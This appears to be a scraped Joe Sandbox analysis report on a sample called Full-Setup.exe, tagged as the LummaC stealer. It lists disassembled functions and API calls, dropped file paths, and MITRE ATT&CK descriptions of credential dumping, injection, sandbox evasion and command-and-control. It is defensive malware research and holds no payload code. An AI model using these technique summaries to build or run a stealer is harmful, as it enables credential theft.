String ID: `5E$h5E
API String ID: 1385522511-527239140
Opcode ID: 2b3091601c142c302427ea0cb31942e32371f51e17410f5dc756cb4b23ff2c6f
Instruction ID: 94f16654f0c4189ce8d5fcc50bac300791d0739baeac8aa2898017966f4c7a51
Opcode Fuzzy Hash: 2b3091601c142c302427ea0cb31942e32371f51e17410f5dc756cb4b23ff2c6f
Instruction Fuzzy Hash: DEE0803550451CEFCB17DF1CD8459983354E7063B3B115175E511CB393F7245A42D69C

Function 003F39D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 003F39F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 003F3A05

Strings

aut, xrefs: 003F39F9

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: edcb844155f57db295e787e9e12320859c72aa86885ac78559d74fac9a606b01
Instruction ID: c480cd6385fac2bece4940a72c8131de1064b348ff3989f954f7b08148fc2cba
Opcode Fuzzy Hash: edcb844155f57db295e787e9e12320859c72aa86885ac78559d74fac9a606b01
Instruction Fuzzy Hash: 59D05EB290032867DA20A764DC0EFCB7B6CDB44710F0002E1BA65A2091DBF4DA85CBD4

Function 00412DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00412E08
PostMessageW.USER32(00000000), ref: 00412E0F

Part of subcall function 003EF292: Sleep.KERNEL32 ref: 003EF30A

Strings

Shell_TrayWnd, xrefs: 00412E01

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: ea5937eeb281d4732304365b246edd207f2be981beff2b830d93ddb49e62f8ea
Instruction ID: 9610a35e57ff96c4a63a1f6bceebb7666d000dfac6d5ece085038483be0b5718
Opcode Fuzzy Hash: ea5937eeb281d4732304365b246edd207f2be981beff2b830d93ddb49e62f8ea
Instruction Fuzzy Hash: AAD0C9757C53107AF668A770AC0BFD66B549B54B10F6088357345AA1D4CAE46801C698

Function 00412DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00412DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00412DDB

Part of subcall function 003EF292: Sleep.KERNEL32 ref: 003EF30A

Strings

Shell_TrayWnd, xrefs: 00412DC1

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 5bb2fce71329359942660334d0649de86fc7893d82101a334338e2e210146458
Instruction ID: ceca69b79a09b6409abe8f2a2f514f19a08ca5ddf466098972175c4d211361b6
Opcode Fuzzy Hash: 5bb2fce71329359942660334d0649de86fc7893d82101a334338e2e210146458
Instruction Fuzzy Hash: E1D012797D5310BBF668B770AC0FFD67B549F50B10F6088357349AA1D4CAE46801C698

Function 003BC17D Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 003BC213
GetLastError.KERNEL32 ref: 003BC221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003BC27C

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: faf6c022dceea3866098ec51c1b3ede3805c86e26f0a6edbb0f16d24de5efc43
Instruction ID: 3da779ddfe0b3d1039a73930bd1daa8c84c63b0eae11c97567e61db08de45382
Opcode Fuzzy Hash: faf6c022dceea3866098ec51c1b3ede3805c86e26f0a6edbb0f16d24de5efc43
Instruction Fuzzy Hash: 4741F630610606AFDF338FE4C844AEA7BA5EF15714F265569FE55AF5A1DB308D00C760

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Full-Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1

C:\Users\user\AppData\Local\Temp\600044\Glow.com

C:\Users\user\AppData\Local\Temp\600044\k

C:\Users\user\AppData\Local\Temp\Business

C:\Users\user\AppData\Local\Temp\Cancel

C:\Users\user\AppData\Local\Temp\Chosen

C:\Users\user\AppData\Local\Temp\Condition

C:\Users\user\AppData\Local\Temp\Encyclopedia

C:\Users\user\AppData\Local\Temp\Environments

C:\Users\user\AppData\Local\Temp\Exploring

C:\Users\user\AppData\Local\Temp\Investment

Windows Analysis Report
Full-Setup.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre